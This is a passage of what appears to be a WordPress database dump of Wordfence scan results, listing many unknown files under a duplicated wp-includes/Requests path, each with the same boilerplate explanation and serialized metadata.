More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/Requests/Auth/Basic.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33553,1631564671,1631564671,'new','knownfile',75,'b1052904b07b4b9ec5683ce661852d39','abfbb530738781176a054b537541dc5b','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Auth.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:41:\"wp-includes/wp-includes/Requests/Auth.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33554,1631564671,1631564671,'new','knownfile',75,'a7657ad922d401f0aa6e4796babc36e4','2e8f59cc13f5e1f9b763062c35c5f323','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Cookie/Jar.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:47:\"wp-includes/wp-includes/Requests/Cookie/Jar.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33555,1631564671,1631564671,'new','knownfile',75,'666e4fea6929870f52f767a3e96a551d','d87eff54d3020cb1757a83dbf5564976','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Cookie.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:43:\"wp-includes/wp-includes/Requests/Cookie.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33556,1631564671,1631564671,'new','knownfile',75,'8a980b15ab3b626c47aeef2dac297211','e326880d8063a5ca4658897245e31776','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/304.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/304.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33557,1631564671,1631564671,'new','knownfile',75,'d6b8b621fe8a566b17a842c7f33fd6ac','5a57923588451c95a655250f83912fbf','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33558,1631564671,1631564671,'new','knownfile',75,'f7cab5854046f1f353a91a833a821929','055c3c716d50af55153f2668029419db','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/306.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/306.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33559,1631564671,1631564671,'new','knownfile',75,'cbce6cc6d1164a15f41f6f7ccf3414df','d394c831c9b4eebf1fa7af98709a430a','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/400.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/400.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33560,1631564671,1631564671,'new','knownfile',75,'fe6e14e633330a4e81173af9eccc1e12','0a3ef86be58841f4056bdb9e212e2ce7','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/401.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/401.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33561,1631564671,1631564671,'new','knownfile',75,'7c41dacc59c02300fbb58db17df125d3','f089e5ee009be67e92cbfc946bf05624','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/402.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/402.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33562,1631564671,1631564671,'new','knownfile',75,'df44e2554e9580d09247021fad0343c7','5c8576c46059c0c30ec86728d101f90a','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/403.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/403.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33563,1631564671,1631564671,'new','knownfile',75,'9f1af97586ea259c3072d6ddbf9012bf','f1cb9ebbcffeb5203f153b04a8b2c917','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/404.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/404.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33564,1631564671,1631564671,'new','knownfile',75,'1607825cbc63a29489f2c3073deea98f','7ea7a5764f8be886efda45344ffb5715','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/405.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/405.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33565,1631564672,1631564672,'new','knownfile',75,'737345db2015082cd9c6b7d4ca741308','99f12302a0c831b8adc1fbf80601758a','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/406.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/406.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33566,1631564672,1631564672,'new','knownfile',75,'5b2ec4fe8d65100bb0d8fde4958efbe2','35463540ac9c92cec6b4fa6bad9b4b96','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/407.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/407.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33567,1631564672,1631564672,'new','knownfile',75,'d29998fbae04914685bac6c967e05eb7','3014f75c854c27d27d601ffea6e05be3','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/408.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/408.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33568,1631564672,1631564672,'new','knownfile',75,'77122e8cb1ff0d928695f315f8d8e682','665e11627e62391ee74d000ac6142d70','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/409.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/409.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33569,1631564672,1631564672,'new','knownfile',75,'134654f542a9ff037bbf42e12e619219','2120f5127900e0ceab7cfbd77ad757df','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/410.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/410.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33570,1631564672,1631564672,'new','knownfile',75,'ee37d86f3c6ab67acd54ec3a1425cd6d','52e516abb52f2d2e381cc8e1edc3efbd','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/411.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/411.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33571,1631564672,1631564672,'new','knownfile',75,'5472b7abee7a6994f680b78b84ab3d8d','4006d421948ee1d0b7066cfc3341cecd','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/412.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/412.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33572,1631564672,1631564672,'new','knownfile',75,'634f8be8351981066277e9cbde375685','78ad09f17a651310740e75f843ad2334','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/413.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/413.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33573,1631564672,1631564672,'new','knownfile',75,'0e858d262273b0f66ce66da904ae16dc','164f14e69998d5e22ac94343dcda2c89','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/414.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/414.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33574,1631564672,1631564672,'new','knownfile',75,'1d3cfbc8670f41f9db8a7ec79cebbda5','d7deccb00aa65d8dd921601b4bd1808c','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/415.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/415.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33575,1631564672,1631564672,'new','knownfile',75,'71d28f180cf3255ffb8e418742a3bc49','808d5fb817953a55be1bd9ef6b0a8ed3','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/416.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/416.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33576,1631564672,1631564672,'new','knownfile',75,'e879c8996120a39804e48f8a7af946b2','21aa2a6f2717f4c124ffa2ec669a0a91','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/417.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/417.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33577,1631564672,1631564672,'new','knownfile',75,'9e63f337b459877d77739c104fea18de','ab875841dcf92a2d78c10312bbd4b590','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/418.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/418.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33578,1631564672,1631564672,'new','knownfile',75,'1070d5557e6cafac795f1415acaa049a','e153eae567233da78018e16aad68a343','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/428.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/428.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33579,1631564672,1631564672,'new','knownfile',75,'3186b4f14b3ce8d599f1f181df63421f','fcfa179158ebadc7dda55a091748d641','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/429.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/429.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33580,1631564672,1631564672,'new','knownfile',75,'d9d01167f82184eda2bbaadf831ead1d','f42016e35f57ebabcad3d926ccecc2da','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/431.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/431.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33581,1631564672,1631564672,'new','knownfile',75,'3868326b3d3add86158888d5d7f00abc','1c729118c7dc30d01bd8044ac49d0a6a','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/500.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/500.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33582,1631564672,1631564672,'new','knownfile',75,'3f9f7d66b66332a2fc25e5ee3c48206e','5ab2013f4f432705f0b2add4e83a67c4','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/501.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/501.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33583,1631564672,1631564672,'new','knownfile',75,'e87ce5c2adda30b7402657098a4df8f6','a8e279e2d177bd6c147e1d5d01011143','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/502.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/502.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33584,1631564672,1631564672,'new','knownfile',75,'6c50465f250ea4f3a780b5ab9725dd90','13b02736dd0e550e8626c230934ef251','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/503.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/503.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33585,1631564672,1631564672,'new','knownfile',75,'be5b672597c76a05305236a6b5015c1f','de7334f4e3da3b50268f3438328ad243','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/504.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/504.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33586,1631564672,1631564672,'new','knownfile',75,'cd09a49d7ebf0cf0da34674b02417c77','7b06a0dcd8202d41e510053c4b8f6814','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/505.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/505.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33587,1631564672,1631564672,'new','knownfile',75,'6a4081aefcda0f5cc24b9df9a19e257d','699f8e34536913da1a44ce066f6162c7','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/511.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/Requests/Exception/HTTP/511.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33588,1631564672,1631564672,'new','knownfile',75,'ed480a16c91ac3de915ed34c8b6c8da7','5cd60e318cf787b064252e943f3ae189','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP/Unknown.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/Requests/Exception/HTTP/Unknown.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33589,1631564673,1631564673,'new','knownfile',75,'070ff4dc9052b9ffb2aafab51ad72a93','77d1738831f51cc08170b6f32bcf95b2','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/HTTP.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:51:\"wp-includes/wp-includes/Requests/Exception/HTTP.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33590,1631564673,1631564673,'new','knownfile',75,'9d69308d83e39859178a58f3b37ad5e2','5e43dd34b05bcdad13f0c0478f2ed4c0','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/Transport/cURL.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/Requests/Exception/Transport/cURL.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33591,1631564673,1631564673,'new','knownfile',75,'a9a0b65835a140e31912b2dde0b17e2e','fe19e2a5ca88c3158b7dcffbe7233566','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception/Transport.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More</a>','a:5:{s:4:\"file\";s:56:\"wp-includes/wp-includes/Requests/Exception/Transport.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(33592,1631564673,1631564673,'new','knownfile',75,'7f89d633e234836857784a3ad6e847a9','ead042d53f28346332fcd0af04a646f5','Unknown file in WordPress core: wp-includes/wp-includes/Requests/Exception.php','This file is in a WordPress core location but is not 